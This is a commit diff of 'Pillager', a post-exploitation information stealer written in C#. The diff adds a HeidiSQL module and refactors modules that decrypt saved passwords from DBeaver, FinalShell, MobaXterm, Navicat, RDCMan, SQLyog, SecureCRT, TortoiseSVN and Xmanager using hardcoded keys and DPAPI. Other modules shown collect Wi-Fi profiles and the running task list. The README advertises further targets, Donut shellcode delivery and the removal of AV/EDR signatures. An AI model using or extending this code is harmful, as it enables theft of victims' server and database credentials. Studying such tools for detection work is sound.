sb.AppendLine(string.Format("{0,-30} {1,-8} {2,-6} {3,-28} {4,8} M", line));
}
return sb.ToString();
}
public override void Save(string path)
{
try
{
string savepath = Path.Combine(path, "System");
string result = GetInfo();
if (!string.IsNullOrEmpty(result))
{
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "TaskList.txt"), result, Encoding.UTF8);
}
}
catch { }
}
}
}

11
Pillager/SystemInfos/Wifi.cs
View File

@ -6,10 +6,9 @@ using Pillager.Helper;
namespace Pillager.SystemInfos
{
internal class Wifi
internal class Wifi : ICommandOnce
{
public static string SystemInfoName = "Wifi";
private static string GetMessage()
private string GetMessage()
{
const int dwClientVersion = 2;
IntPtr clientHandle = IntPtr.Zero;
@ -68,16 +67,16 @@ namespace Pillager.SystemInfos
return sb.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string savepath = Path.Combine(path, SystemInfoName);
string savepath = Path.Combine(path, "System");
string wifi = GetMessage();
if (!string.IsNullOrEmpty(wifi))
{
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, SystemInfoName + ".txt"), wifi);
File.WriteAllText(Path.Combine(savepath, "Wifi.txt"), wifi, Encoding.UTF8);
}
}
catch { }

25
Pillager/Tools/DBeaver.cs
View File

@ -1,20 +1,15 @@
using Microsoft.Win32;
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;
namespace Pillager.Tools
{
internal class DBeaver
internal class DBeaver : ICommand
{
public static string ToolName = "DBeaver";
public static string ConnectionInfo(string config, string sources)
public string ConnectionInfo(string config, string sources)
{
StringBuilder sb = new StringBuilder();
string pattern = @"\""(?<key>[^""]+)\""\s*:\s*\{\s*\""#connection\""\s*:\s*\{\s*\""user\""\s*:\s*\""(?<user>[^""]+)\""\s*,\s*\""password\""\s*:\s*\""(?<password>[^""]+)\""\s*\}\s*\}";
@ -32,7 +27,7 @@ namespace Pillager.Tools
return sb.ToString();
}
public static string MatchDataSource(string json, string jdbcKey)
public string MatchDataSource(string json, string jdbcKey)
{
string pattern = $"\"({Regex.Escape(jdbcKey)})\":\\s*{{[^}}]+?\"url\":\\s*\"([^\"]+)\"[^}}]+?}}";
Match match = Regex.Match(json, pattern);
@ -44,12 +39,12 @@ namespace Pillager.Tools
return "";
}
public static string GetAppDataFolderPath()
public string GetAppDataFolderPath()
{
string appDataFolderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
return appDataFolderPath;
}
public static string Decrypt(string filePath, string keyHex, string ivHex)
public string Decrypt(string filePath, string keyHex, string ivHex)
{
byte[] encryptedBytes = File.ReadAllBytes(filePath);
byte[] key = StringToByteArray(keyHex);
@ -74,7 +69,7 @@ namespace Pillager.Tools
}
}
}
private static byte[] StringToByteArray(string hex)
private byte[] StringToByteArray(string hex)
{
int numberChars = hex.Length;
byte[] bytes = new byte[numberChars / 2];
@ -85,17 +80,17 @@ namespace Pillager.Tools
return bytes;
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string sources = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DBeaverData\\workspace6\\General\\.dbeaver\\data-sources.json");
string credentials = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DBeaverData\\workspace6\\General\\.dbeaver\\credentials-config.json");
if (!File.Exists(sources)||!File.Exists(credentials))return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, "DBeaver");
Directory.CreateDirectory(savepath);
string output = ConnectionInfo(Decrypt(credentials, "babb4a9f774ab853c96c2d653dfe544a", "00000000000000000000000000000000"), sources);
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, "DBeaver.txt"), output, Encoding.UTF8);
}
catch { }
}

65
Pillager/Tools/FinalShell.cs
View File

@ -1,4 +1,5 @@
using System;
using Pillager.Helper;
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
@ -6,11 +7,9 @@ using System.Text.RegularExpressions;
namespace Pillager.Tools
{
internal class FinalShell
internal class FinalShell : ICommand
{
public static string ToolName = "FinalShell";
public static string GetInfo()
public string GetInfo()
{
StringBuilder sb = new StringBuilder();
string connPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\finalshell\conn";
@ -55,7 +54,7 @@ namespace Pillager.Tools
return sb.ToString();
}
public static byte[] desDecode(byte[] data, byte[] head)
public byte[] desDecode(byte[] data, byte[] head)
{
byte[] TripleDesIV = { 0, 0, 0, 0, 0, 0, 0, 0 };
byte[] key = new byte[8];
@ -72,7 +71,7 @@ namespace Pillager.Tools
return ms.ToArray();
}
public static string decodePass(string data)
public string decodePass(string data)
{
if (data == null)
{
@ -90,7 +89,7 @@ namespace Pillager.Tools
return rs;
}
static byte[] ranDomKey(byte[] head)
byte[] ranDomKey(byte[] head)
{
long ks = 3680984568597093857L / new JavaRng(head[5]).nextInt(127);
JavaRng random = new JavaRng(ks);
@ -141,7 +140,7 @@ namespace Pillager.Tools
}
}
public static byte[] md5(byte[] data)
public byte[] md5(byte[] data)
{
try
{
@ -153,60 +152,18 @@ namespace Pillager.Tools
{ return null; }
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string connPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\finalshell\conn";
if (!Directory.Exists(connPath)) return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, "FinalShell");
Directory.CreateDirectory(savepath);
string output = GetInfo();
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, "FinalShell.txt"), output, Encoding.UTF8);
}
catch { }
}
}
public sealed class JavaRng
{
public JavaRng(long seed)
{
_seed = (seed ^ LARGE_PRIME) & ((1L << 48) - 1);
}
public long nextLong()
{
return ((long)next(32) << 32) + next(32);
}
public int nextInt(int bound)
{
if (bound <= 0)
throw new ArgumentOutOfRangeException(nameof(bound), bound, "bound must be positive");
int r = next(31);
int m = bound - 1;
if ((bound & m) == 0) // i.e., bound is a power of 2
r = (int)((bound * (long)r) >> 31);
else
{
for (int u = r;
u - (r = u % bound) + m < 0;
u = next(31))
;
}
return r;
}
private int next(int bits)
{
_seed = (_seed * LARGE_PRIME + SMALL_PRIME) & ((1L << 48) - 1);
return (int)((_seed) >> (48 - bits));
}
private long _seed;
private const long LARGE_PRIME = 0x5DEECE66DL;
private const long SMALL_PRIME = 0xBL;
}
}

103
Pillager/Tools/HeidiSQL.cs Normal file
View File

@ -0,0 +1,103 @@
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.Devices;
using Microsoft.Win32;
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.Globalization;
using System.IO;
using System.Linq;
using System.Text;
using static System.Net.Mime.MediaTypeNames;
namespace Pillager.Tools
{
internal class HeidiSQL : ICommand
{
Dictionary<int, string> service_types = new Dictionary<int, string>(){
{0, "mysql"},
{1, "mysql-named-pipe"},
{2, "mysql-ssh"},
{3, "mssql-named-pipe"},
{4, "mssql"},
{5, "mssql-spx-ipx"},
{6, "mssql-banyan-vines"},
{7, "mssql-windows-rpc"},
{8, "postgres"},
};
public string GetInfo()
{
StringBuilder sb = new StringBuilder();
string registry = @"Software\HeidiSQL\Servers";
var registryKey = Registry.CurrentUser.OpenSubKey(registry);
if (registryKey != null)
{
foreach (var subKeyName in registryKey.GetSubKeyNames())
{
var subKey = Registry.CurrentUser.OpenSubKey(subKeyName);
string site_key = subKeyName;
string host = subKey.GetValue("Host","").ToString();
string user = subKey.GetValue("User", "").ToString();
string port = subKey.GetValue("Port", "").ToString();
int db_type = (int)subKey.GetValue("NetType", 0);
int prompt = (int)subKey.GetValue("LoginPrompt", 0);
int win_auth = (int)subKey.GetValue("WindowsAuth", 0);
string epass = (string)subKey.GetValue("Password", "");
if (db_type > 3 && db_type < 7 && win_auth == 1) continue;
if (string.IsNullOrEmpty(epass)|| epass.Length==1|| prompt==1) continue;
string pass = Decrypt(epass);
sb.AppendLine($"Service: {service_types[db_type]}");
sb.AppendLine($"Host: {host}");
sb.AppendLine($"Port: {port}");
sb.AppendLine($"User: {user}");
sb.AppendLine($"Password: {pass}");
sb.AppendLine();
}
}
return sb.ToString();
}
private string Decrypt(string input)
{
try
{
int py = Convert.ToInt32(input.Skip(input.Length - 1).Take(1).ToArray()[0].ToString());
input = input.Remove(input.Length - 1, 1);
byte[] t = HexToByte(input);
for (int i = 0; i < t.Length; i++)
{
t[i] = (byte)(t[i] - py);
}
return Encoding.UTF8.GetString(t);
}
catch { return ""; }
}
public static byte[] HexToByte(string msg)
{
byte[] comBuffer = new byte[msg.Length / 2];
for (int i = 0; i < msg.Length; i += 2)
{
comBuffer[i / 2] = (byte)Convert.ToByte(msg.Substring(i, 2), 16);
}
return comBuffer;
}
public override void Save(string path)
{
try
{
string output = GetInfo();
if (!string.IsNullOrEmpty(output))
{
string savepath = Path.Combine(path, "HeidiSQL");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, "HeidiSQL.txt"), output, Encoding.UTF8);
}
}
catch { }
}
}
}

30
Pillager/Tools/MobaXterm.cs
View File

@ -10,11 +10,9 @@ using Pillager.Helper;
namespace Pillager.Tools
{
internal class MobaXterm
internal class MobaXterm : ICommand
{
public static string ToolName = "MobaXterm";
public static string FromINI(List<string> pathlist)
public string FromINI(List<string> pathlist)
{
StringBuilder stringBuilder = new StringBuilder();
foreach (var path in pathlist)
@ -102,7 +100,7 @@ namespace Pillager.Tools
return stringBuilder.ToString();
}
public static string FromRegistry()
public string FromRegistry()
{
StringBuilder stringBuilder = new StringBuilder();
List<string> passwordlist = new List<string>();
@ -188,7 +186,7 @@ namespace Pillager.Tools
return null;
}
public static string DecryptWithMP(string SessionP, string Sesspasses, string Ciphertext)
public string DecryptWithMP(string SessionP, string Sesspasses, string Ciphertext)
{
byte[] bytes = Convert.FromBase64String(Sesspasses);
//byte[] key = KeyCrafter(SessionP);
@ -219,7 +217,7 @@ namespace Pillager.Tools
return t1;
}
public static string DecryptWithoutMP(string SessionP, string Ciphertext)
public string DecryptWithoutMP(string SessionP, string Ciphertext)
{
byte[] key = KeyCrafter(SessionP);
byte[] text = Encoding.ASCII.GetBytes(Ciphertext);
@ -252,7 +250,7 @@ namespace Pillager.Tools
return "";
}
public static byte[] RightBytes(byte[] input)
public byte[] RightBytes(byte[] input)
{
byte[] bytes = new byte[input.Length];
for (int i = 0; i < input.Length-1; i++)
@ -263,12 +261,12 @@ namespace Pillager.Tools
return bytes;
}
public static List<string> GetINI()
public List<string> GetINI()
{
List<string> pathlist = new List<string>();
foreach (var process in Process.GetProcesses())
{
if (process.ProcessName.Contains(ToolName))
if (process.ProcessName.Contains("MobaXterm"))
{
try
{
@ -282,7 +280,7 @@ namespace Pillager.Tools
return pathlist;
}
private static string AESDecrypt(byte[] encryptedBytes, byte[] bKey, byte[] iv)
private string AESDecrypt(byte[] encryptedBytes, byte[] bKey, byte[] iv)
{
MemoryStream mStream = new MemoryStream(encryptedBytes);
RijndaelManaged aes = new RijndaelManaged();
@ -308,7 +306,7 @@ namespace Pillager.Tools
}
}
private static byte[] AESEncrypt(byte[] plainBytes, byte[] bKey)
private byte[] AESEncrypt(byte[] plainBytes, byte[] bKey)
{
MemoryStream mStream = new MemoryStream();
RijndaelManaged aes = new RijndaelManaged();
@ -331,7 +329,7 @@ namespace Pillager.Tools
}
}
public static byte[] KeyCrafter(string SessionP)
public byte[] KeyCrafter(string SessionP)
{
while (SessionP.Length < 20)
{
@ -357,18 +355,18 @@ namespace Pillager.Tools
return key;
}
public static void Save(string path)
public override void Save(string path)
{
try
{
List<string> pathlist=GetINI();
if (pathlist.Count==0) return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, "MobaXterm");
Directory.CreateDirectory(savepath);
string registryout = FromRegistry();
string iniout = FromINI(pathlist);
string output = registryout + iniout;
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, "MobaXterm.txt"), output, Encoding.UTF8);
}
catch { }
}

12
Pillager/Tools/Navicat.cs
View File

@ -6,11 +6,9 @@ using Pillager.Helper;
namespace Pillager.Tools
{
internal class Navicat
internal class Navicat : ICommand
{
public static string ToolName = "Navicat";
public static string DecryptPwd()
public string DecryptPwd()
{
StringBuilder sb = new StringBuilder();
Navicat11Cipher Decrypt = new Navicat11Cipher();
@ -57,16 +55,16 @@ namespace Pillager.Tools
return sb.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
var registryKey = Registry.CurrentUser.OpenSubKey(@"Software\PremiumSoft");
if (registryKey == null) return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, "Navicat");
Directory.CreateDirectory(savepath);
string output = DecryptPwd();
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, "Navicat.txt"), output, Encoding.UTF8);
}
catch { }
}

17
Pillager/Tools/RDCMan.cs
View File

@ -1,3 +1,4 @@
using Pillager.Helper;
using System;
using System.Collections.Generic;
using System.IO;
@ -7,11 +8,9 @@ using System.Xml;
namespace Pillager.Tools
{
internal class RDCMan
internal class RDCMan : ICommand
{
public static string ToolName = "RDCMan";
public static string DecryptPwd()
public string DecryptPwd()
{
StringBuilder sb = new StringBuilder();
var RDGFiles = new List<string>();
@ -34,14 +33,14 @@ namespace Pillager.Tools
return sb.ToString();
}
private static string DecryptPassword(string password)
private string DecryptPassword(string password)
{
byte[] passwordBytes = Convert.FromBase64String(password);
password = Encoding.UTF8.GetString(ProtectedData.Unprotect(passwordBytes, null, DataProtectionScope.CurrentUser)).Replace("\0", "");
return password;
}
private static string ParseRDGFile(string RDGPath)
private string ParseRDGFile(string RDGPath)
{
StringBuilder stringBuilder = new StringBuilder();
try
@ -95,16 +94,16 @@ namespace Pillager.Tools
return stringBuilder.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string rdgPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\Microsoft\Remote Desktop Connection Manager\RDCMan.settings";
if (!File.Exists(rdgPath)) return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, "RDCMan");
Directory.CreateDirectory(savepath);
string output = DecryptPwd();
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, "RDCMan.txt"), output, Encoding.UTF8);
}
catch { }
}

20
Pillager/Tools/SQLyog.cs
View File

@ -8,13 +8,11 @@ using Pillager.Helper;
namespace Pillager.Tools
{
internal class SQLyog
internal class SQLyog : ICommand
{
public static string ToolName = "SQLyog";
private static byte[] keyArray = { 0x29, 0x23, 0xBE, 0x84, 0xE1, 0x6C, 0xD6, 0xAE, 0x52, 0x90, 0x49, 0xF1, 0xC9, 0xBB, 0x21, 0x8F };
private static byte[] ivArray = { 0xB3, 0xA6, 0xDB, 0x3C, 0x87, 0x0C, 0x3E, 0x99, 0x24, 0x5E, 0x0D, 0x1C, 0x06, 0xB7, 0x47, 0xDE };
private static string OldDecrypt(string text)
private byte[] keyArray = { 0x29, 0x23, 0xBE, 0x84, 0xE1, 0x6C, 0xD6, 0xAE, 0x52, 0x90, 0x49, 0xF1, 0xC9, 0xBB, 0x21, 0x8F };
private byte[] ivArray = { 0xB3, 0xA6, 0xDB, 0x3C, 0x87, 0x0C, 0x3E, 0x99, 0x24, 0x5E, 0x0D, 0x1C, 0x06, 0xB7, 0x47, 0xDE };
private string OldDecrypt(string text)
{
byte[] bytes = Convert.FromBase64String(text);
for (int i = 0; i < bytes.Length; i++)
@ -24,7 +22,7 @@ namespace Pillager.Tools
return Encoding.UTF8.GetString(bytes);
}
private static string NewDecrypt(string text)
private string NewDecrypt(string text)
{
byte[] bytes = Convert.FromBase64String(text);
byte[] bytespad = new byte[128];
@ -40,7 +38,7 @@ namespace Pillager.Tools
return Encoding.UTF8.GetString(resultArray);
}
private static string Decrypt(string path)
private string Decrypt(string path)
{
Pixini p = Pixini.Load(path);
Dictionary<string, List<IniLine>> sectionMap = p.sectionMap;
@ -63,16 +61,16 @@ namespace Pillager.Tools
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string inipath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "SQLyog\\sqlyog.ini");
if (!File.Exists(inipath)) return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, "SQLyog");
Directory.CreateDirectory(savepath);
File.Copy(inipath, Path.Combine(savepath, "sqlyog.ini"));
File.WriteAllText(Path.Combine(savepath, "sqlyog_decrypted.ini"), Decrypt(inipath));
File.WriteAllText(Path.Combine(savepath, "sqlyog_decrypted.ini"), Decrypt(inipath), Encoding.UTF8);
}
catch { }
}

18
Pillager/Tools/SecureCRT.cs
View File

@ -8,11 +8,9 @@ using System.Text;
namespace Pillager.Tools
{
internal class SecureCRT
internal class SecureCRT : ICommand
{
public static string ToolName = "SecureCRT";
public static string DecryptV2(string input, string passphrase = "")
public string DecryptV2(string input, string passphrase = "")
{
try
{
@ -89,7 +87,7 @@ namespace Pillager.Tools
}
}
private static byte[] fromhex(string hex)
private byte[] fromhex(string hex)
{
byte[] mybyte = new byte[int.Parse(Math.Ceiling(hex.Length / 2.0).ToString())];
for (int i = 0; i < mybyte.Length; i++)
@ -101,7 +99,7 @@ namespace Pillager.Tools
return mybyte;
}
public static string Decrypt(string str)
public string Decrypt(string str)
{
byte[] IV = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
byte[] Key1 = { 0x24, 0xa6, 0x3d, 0xde, 0x5b, 0xd3, 0xb3, 0x82, 0x9c, 0x7e, 0x06, 0xf4, 0x08, 0x16, 0xaa, 0x07 };
@ -124,7 +122,7 @@ namespace Pillager.Tools
return ciphered;
}
public static string GetInfo()
public string GetInfo()
{
StringBuilder sb = new StringBuilder();
string name = "Software\\VanDyke\\SecureCRT";
@ -163,15 +161,15 @@ namespace Pillager.Tools
return sb.ToString();
}
public static void Save(string path)
public override void Save(string path)
{
try
{
string output = GetInfo();
if (string.IsNullOrEmpty(output)) return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, "SecureCRT");
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
File.WriteAllText(Path.Combine(savepath, "SecureCRT.txt"), output, Encoding.UTF8);
}
catch { }
}

15
Pillager/Tools/TortoiseSVN.cs
View File

@ -1,17 +1,14 @@
using System;
using System.Collections.Generic;
using Pillager.Helper;
using System;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
namespace Pillager.Tools
{
internal class TortoiseSVN
internal class TortoiseSVN : ICommand
{
public static string ToolName = "TortoiseSVN";
public static string Decrypt(string input)
public string Decrypt(string input)
{
try
{
@ -24,7 +21,7 @@ namespace Pillager.Tools
}
}
public static void Save(string path)
public override void Save(string path)
{
try
{
@ -32,7 +29,7 @@ namespace Pillager.Tools
if (!Directory.Exists(folder)) return;
string[] files = Directory.GetFiles(folder, new String('?', 32));
if (files.Length == 0) return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, "TortoiseSVN");
Directory.CreateDirectory(savepath);
foreach (string file in files)
{

20
Pillager/Tools/Xmanager.cs
View File

@ -10,13 +10,11 @@ using Pillager.Helper;
namespace Pillager.Tools
{
internal static class Xmanager
internal class Xmanager : ICommand
{
public static string ToolName = "Xmanager";
public List<string> sessionFiles = new List<string>();
public static List<string> sessionFiles = new List<string>();
public static void GetAllAccessibleFiles(string rootPath)
public void GetAllAccessibleFiles(string rootPath)
{
DirectoryInfo di = new DirectoryInfo(rootPath);
var dirs = di.GetDirectories();
@ -35,7 +33,7 @@ namespace Pillager.Tools
}
}
public static string DecryptSessions()
public string DecryptSessions()
{
StringBuilder sb = new StringBuilder();
WindowsIdentity currentUser = WindowsIdentity.GetCurrent();
@ -60,7 +58,7 @@ namespace Pillager.Tools
return sb.ToString();
}
static List<string> ReadConfigFile(string path)
List<string> ReadConfigFile(string path)
{
string fileData = File.ReadAllText(path);
string Version = null;
@ -91,7 +89,7 @@ namespace Pillager.Tools
return resultString;
}
static string Decrypt(string username, string sid, string rawPass, string ver)
string Decrypt(string username, string sid, string rawPass, string ver)
{
if (ver.StartsWith("5.0") || ver.StartsWith("4") || ver.StartsWith("3") || ver.StartsWith("2"))
{
@ -154,16 +152,16 @@ namespace Pillager.Tools
return "";
}
public static void Save(string path)
public override void Save(string path)
{
try
{
GetAllAccessibleFiles(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments));
if (sessionFiles.Count == 0) return;
string savepath = Path.Combine(path, ToolName);
string savepath = Path.Combine(path, "Xmanager");
Directory.CreateDirectory(savepath);
string output = DecryptSessions();
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, ToolName + ".txt"), output);
if (!string.IsNullOrEmpty(output)) File.WriteAllText(Path.Combine(savepath, "Xmanager.txt"), output, Encoding.UTF8);
}
catch { }
}

8
README.md
View File

@ -60,6 +60,7 @@ Pillager is a tool for exporting and decrypting useful data from target computer
* MailMaster
* Foxmail
* FileZilla
* Teams
* Password Recovery
* MobaXterm
* Xmanager
@ -74,10 +75,12 @@ Pillager is a tool for exporting and decrypting useful data from target computer
* DBeaver
* CoreFTP
* Snowflake
* HeidiSQL
* Personal Infomation
* QQ
* VSCode
* Netease CloudMusic
* Win10Ms_Pinyin
Will add more ......
@ -86,6 +89,11 @@ Will add more ......
* Wifi
* ScreenShot
* InstalledApp
* ClipBoard
* FileList
* RecentFile
* SystemInfo
* TaskList
## Usage

10
README_ZH.md
View File

@ -58,6 +58,7 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
* 网易邮箱大师
* Foxmail
* FileZilla
* Teams
* 凭据提取
* MobaXterm
* Xmanager
@ -72,10 +73,12 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
* DBeaver
* CoreFTP
* Snowflake
* HeidiSQL
* 个人信息
* QQ
* VSCode
* 网易云音乐
* Win10拼音输入法
后续将会陆续添加支持的软件
@ -84,6 +87,11 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
* Wifi
* 截屏
* 已安装应用
* 剪贴板
* 文件列表
* 最近文件
* 系统信息
* 进程列表
## 使用方法
@ -100,7 +108,7 @@ Pillager是一个适用于后渗透期间的信息收集工具可以收集目
## 优点
* 体积在100kb左右为同类工具体积的几分之一甚至几十分之一
* 支持大部分常见浏览器,常见聊天软件的信息提取,将陆续添加其他常用工具的信息收集
* 支持大部分常见浏览器,常见聊天软件和运维软件的信息提取,将陆续添加其他常用工具的信息收集
* 长期维护,有问题可以及时的反馈处理
* 使用魔改版本的Donut缩小shellcode体积使shellcode兼容.Net Framework v3.5/v4.x并去除AV/EDR对Donut提取的特征

0
cs-plugin/browser.cna → cs-plugin/Pillager.cna
View File